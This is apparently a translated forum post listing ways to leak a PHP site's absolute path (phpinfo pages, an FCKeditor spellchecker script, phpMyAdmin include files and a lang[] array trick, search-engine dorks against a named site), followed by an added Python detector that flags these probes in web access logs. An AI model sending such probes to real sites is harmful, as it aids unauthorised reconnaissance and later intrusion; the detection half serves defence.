1. Try test.php, info.php, php_info.php, phpinfo.php
2. Scan to see whether the FCK editor is present; if it is, use fckeditor\editor\dialog\fck_spellerpages\spellerpages\server-scripts\spellchecker.php to leak the path
3. Check whether phpmyadmin or phpMyAdmin is present, then use:
phpMyAdmin/libraries/select_lang.lib.php
phpMyAdmin/darkblue_orange/layout.inc.php
phpMyAdmin/index.php?lang[]=1
phpmyadmin/themes/darkblue_orange/layout.inc.php
4. Use a search engine to leak the absolute path
site:www.huangse.com Warning
site:www.huangse.com inurl:Warning

I'll keep adding to this over time; I won't go into the single-quote method...
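
Seen from the defender's side, the requests listed above leave recognisable entries in a web server access log. The following is an added example, not part of the original post: a Python detector that flags those probes in combined-format log lines. The function names, sample log lines and IP addresses are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Probe signatures built from the paths listed in the post above.
SIGNATURES = {
    "phpinfo-style page": re.compile(r"/(test|info|php_info|phpinfo)\.php$", re.I),
    "FCKeditor spellchecker": re.compile(
        r"/fck_spellerpages/spellerpages/server-scripts/spellchecker\.php$", re.I),
    "phpMyAdmin direct include": re.compile(
        r"/(libraries/select_lang\.lib\.php|(themes/)?darkblue_orange/layout\.inc\.php)$", re.I),
}
ARRAY_LANG = re.compile(r"(^|&)lang\[\]=", re.I)  # index.php?lang[]=1 style request
# Common/combined log format: ip - - [timestamp] "METHOD target PROTO" status ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')

def classify(target):
    """Return the names of the signatures a request target matches."""
    path, _, query = target.partition("?")
    path = unquote(path).replace("\\", "/")  # normalise encoded and Windows-style paths
    hits = [name for name, rx in SIGNATURES.items() if rx.search(path)]
    if ARRAY_LANG.search(unquote(query)):
        hits.append("array-valued lang parameter")
    return hits

def scan(lines):
    """Map client IP -> list of (signature, target, served); served means HTTP 200."""
    findings = defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ip, target, served = m.group(1), m.group(2), m.group(3) == "200"
        for hit in classify(target):
            findings[ip].append((hit, target, served))
    return dict(findings)

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /phpinfo.php HTTP/1.1" 200 70211',
    '203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /phpMyAdmin/index.php?lang%5B%5D=1 HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Oct/2023:13:55:38 +0000] "GET /fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php HTTP/1.1" 404 209',
    '198.51.100.4 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?lang=en HTTP/1.1" 200 1234',
    '198.51.100.9 - - [10/Oct/2023:13:57:12 +0000] "GET /phpmyadmin/themes/darkblue_orange/layout.inc.php HTTP/1.1" 200 310',
]

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE).items():
        print(ip, hits)
```

A finding with `served` set to true means the file exists on the host; whether it actually reveals a path depends on whether PHP's `display_errors` is enabled there.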